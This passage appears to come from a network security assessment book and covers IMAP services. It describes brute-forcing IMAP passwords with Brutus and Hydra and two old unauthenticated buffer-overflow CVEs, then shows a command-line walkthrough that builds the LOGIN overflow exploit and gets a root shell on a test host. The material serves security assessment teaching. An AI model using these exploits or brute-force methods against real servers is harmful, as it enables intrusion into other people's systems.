Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143. The IMAP protocol is much like POP-3; a user authenticates with a plaintext network service and can then collect and manage their email. Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP), distributed from the official UW IMAP site at http://www.washington.edu/imap/. Mark Crispin (http://staff.washington.edu/mrc/) invented and maintains IMAP, which currently uses IMAP4rev1 as the standard server protocol (RFC 3501). 10.4.1 IMAP Brute ForceAs with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus and Hydra do an excellent job brute-forcing valid user-account passwords from both Unix-based and Win32 GUI environments. As mentioned earlier, they can be downloaded from:
Like POP-3, IMAP services are notoriously susceptible to brute-force password-grinding attack because they don't pay attention to account lockout policies and often don't log unsuccessful authentication attempts. 10.4.2 IMAP Process Manipulation AttacksSince 1997, a handful of remotely exploitable security vulnerabilities within IMAP2bis and IMAP4rev1 services have been publicized, which are summarized in Table 10-5.
The serious unauthenticated vulnerabilities in IMAP services are CVE-1999-0005 and CVE-1999-0042. Exploit scripts for the AUTHENTICATE command overflow are available for multiple platforms (including BSDi, Solaris, and Linux) at:
The second unauthenticated vulnerability is the IMAP LOGIN command overflow, for which a good exploit script is available at http://packetstormsecurity.org/Exploit_Code_Archive/imaps.tar.gz. After finding the correct offset to use with the exploit script, it is very straightforward to compromise a vulnerable Linux host, as shown in Example 10-11. Example 10-11. The IMAP2bis LOGIN command overflow in action# wget http://examples.oreilly.com/networksa/tools/imaps.tar.gz # tar xfz imaps.tar.gz # cd imaps # make cc -O2 -o imaps imaps.c imaps.c: In function `imap': imaps.c:35: warning: function returns address of local variable # ls hey.sh imaps* imaps.c include/ makefile other/ readme # ./imaps 192.168.0.35 100 Connecting to 192.168.0.35 on port 143. * OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02 id; uid=0(root) gid=0(root) groups=0(root) |